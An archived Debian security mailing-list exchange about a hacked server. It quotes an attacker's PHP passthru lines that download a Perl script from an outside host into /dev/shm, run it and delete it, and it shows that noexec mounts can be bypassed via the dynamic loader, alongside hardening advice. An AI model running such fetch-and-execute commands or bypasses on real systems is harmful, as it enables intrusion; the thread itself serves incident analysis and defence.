Re: ping22: can not kill this process

To: "Luis Mondesi" <lemsx1@gmail.com>
Cc: debian-security@lists.debian.org
Subject: Re: ping22: can not kill this process
From: "Mike Wang" <comritesecurity@gmail.com>
Date: Thu, 3 Jan 2008 22:13:40 -0500
Message-id: <[🔎] 91dd90da0801031913m495b9fdy921760917c458817@mail.gmail.com>
In-reply-to: <[🔎] c1a7b3c90801031755l7accf08dk6bd8343909834d69@mail.gmail.com>
References: <91dd90da0712301159s3f629c4bsc288aa96a810295d@mail.gmail.com> <E1J99PE-0000a1-00@calista.eckenfels.net> <91dd90da0712301828n6cbea16eq38909526270d2757@mail.gmail.com> <200712311403.53794.jan@stephan.homeunix.net> <[🔎] 91dd90da0801011610u15d93179n27c9bedfd31e62e0@mail.gmail.com> <[🔎] c1a7b3c90801011721y75b45107r92a5f39adb22b43b@mail.gmail.com> <[🔎] 91dd90da0801011846k7e01050du33f6589f27403ef2@mail.gmail.com> <[🔎] 91dd90da0801031518o767a5937je92550695aa66f4f@mail.gmail.com> <[🔎] c1a7b3c90801031755l7accf08dk6bd8343909834d69@mail.gmail.com>

Hi Luis
    You are abosulutely right!!
    Just tried a test script at /tmp,  it is running. So there is not
much point to mount the /tmp /dev/shm as non-exec.
    My misunderstanding of non-exec has been there for a while. :(


thanks a lot.

Mike


On Jan 3, 2008 8:55 PM, Luis Mondesi <lemsx1@gmail.com> wrote:
> On Jan 3, 2008 6:18 PM, Mike Wang <comritesecurity@gmail.com> wrote:
> > Hi folks
> [snip]
> > http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> >  passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
> >  > bb.txt;perl bb.txt;rm -f bb.txt*');
> >  passthru('id');
> > ?>
> >
> >  the /tmp was mounted as rw,noexec,nosuid, so it cannot run.
>
> nope. See below.
>
> >  but not the /dev/shm, so the hacked script downloaded to /dev/shm, and run
> > from there.
> >
> >  what kind applications are using /dev/shm? I googled around,seem not find
> > much information.
> > right now I mount i as rw,noexec,nosuid.
>
> A lot of stuff does. /dev/shm is recommended by LSB if I'm not
> mistaken. I know a few apps who use this (including my own).
>
> Well done tracking this script kiddie.
>
> This is a very stupid hack.
>
> By the way, noexec doesn't buy you anything here. perl bb.txt
> should've worked no matter if /tmp is exec or not. The way I see it
> they both worked (/tmp and /dev/shm). And besides, noexec can't even
> stop executables anyway. That's the stupidest of flags for mount:
>
> $> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo
> foo
>
> And don't even think of making /lib/ld-linux.so.2 non exec or
> something else... Your system will just break in a million pieces ;-)
>
> It's time to tell PHP (via php.ini) not to allow any of those
> functions that allow executing stuff from the system (system,
> passthru, whatever).
>
> Also, you might want to consider using Virtual Servers (Linux VServer,
> Xen, vmware, etc).
>
> Hack me once, shame on you. Hack me any other time with the same
> stupid attack vector, shame on me.
>
> Good that you took time to report this.
>
>
> --
> ----)(-----
> Luis Mondesi
> Maestro Debiano
>
> ----- START ENCRYPTED BLOCK (Triple-ROT13) ------
> Gur Hohagh [Yvahk] qvfgevohgvba oevatf gur fcvevg bs Hohagh gb gur
> fbsgjner jbeyq.
> ----- END ENCRYPTED BLOCK (Triple-ROT13) ------
>



-- 
Best Regards

Mike

Reply to:

References:
- Re: ping22: can not kill this process
  - From: "Mike Wang" <comritesecurity@gmail.com>
- Re: ping22: can not kill this process
  - From: "Luis Mondesi" <lemsx1@gmail.com>
- Re: ping22: can not kill this process
  - From: "Mike Wang" <comritesecurity@gmail.com>
- Re: ping22: can not kill this process
  - From: "Mike Wang" <comritesecurity@gmail.com>
- Re: ping22: can not kill this process
  - From: "Luis Mondesi" <lemsx1@gmail.com>

Prev by Date: Re: ping22: can not kill this process
Next by Date: Re: ping22: can not kill this process
Previous by thread: Re: ping22: can not kill this process
Next by thread: Re: ping22: can not kill this process
Index(es):
- Date
- Thread